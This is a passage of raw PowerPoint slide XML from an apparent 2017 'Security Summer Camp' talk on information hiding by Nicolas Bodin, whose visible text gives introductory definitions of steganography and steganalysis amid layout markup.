          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="-59" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bodin</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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5" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>a French expert</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-5" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> in information hiding</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-5"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5" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-GB" sz="1800" b="0" i="0" strike="noStrike" kern="0" cap="none" spc="-5" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>We were give examples of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="-119" dirty="0">
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Steganography and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" spc="-109" dirty="0" err="1">
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Steganalysis</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-GB" i="0" strike="noStrike" kern="0" cap="none" spc="-5" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>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5"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Included here are some of Nicolas’ slides (I wont cover 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0117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48689" y="1799132"/>
            <a:ext cx="4872326" cy="1119024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168" marR="10067">
              <a:lnSpc>
                <a:spcPct val="101200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-119" dirty="0"/>
              <a:t>Summer </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>Camp  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-119" dirty="0"/>
              <a:t>Information</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="188" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-30" dirty="0"/>
              <a:t>Hiding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1353698" y="3723301"/>
            <a:ext cx="1642145" cy="320216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bodin</a:t>
            </a:r>
            <a:endParaRPr sz="2081" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6832622" y="3773636"/>
            <a:ext cx="984029" cy="274562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1784" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>July</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1784" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1784" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2017</a:t>
            </a:r>
            <a:endParaRPr sz="1784">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19543672">
            <a:off x="-194468" y="2624046"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3729042151"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="102656"/>
            <a:ext cx="8030781" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:tabLst>
                <a:tab pos="6982748" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>A.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="637119"/>
            <a:ext cx="8418352" cy="1442068"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4248150" h="727710">
                <a:moveTo>
                  <a:pt x="0" y="727235"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="727235"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="727235"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="1343940"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61595">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="1760152"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="637119"/>
            <a:ext cx="8418352" cy="1267389"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Steganography	</a:t>
            </a:r>
            <a:endParaRPr sz="2378" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762578" marR="3144690">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="436"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>more </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>cryptography  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hiding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>communication</a:t>
            </a:r>
            <a:endParaRPr sz="2081" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="2235924"/>
            <a:ext cx="8418352" cy="1873681"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4248150" h="945514">
                <a:moveTo>
                  <a:pt x="0" y="944966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4248048" y="944966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="944966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="2942722"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="3358935"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="925720" y="3775145"/>
            <a:ext cx="0" cy="122058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="61594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="61582"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="61582">
            <a:solidFill>
              <a:srgbClr val="A5BAC4"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="2235924"/>
            <a:ext cx="8418352" cy="1677373"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Steganalysis	</a:t>
            </a:r>
            <a:endParaRPr sz="2378" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762578">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Detection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="404" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>communication</a:t>
            </a:r>
            <a:endParaRPr sz="2081" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="762578" marR="2047381">
              <a:lnSpc>
                <a:spcPct val="125299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Study </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>statistical </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>properties </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>medium  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Train </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="446" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-99" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" dirty="0">
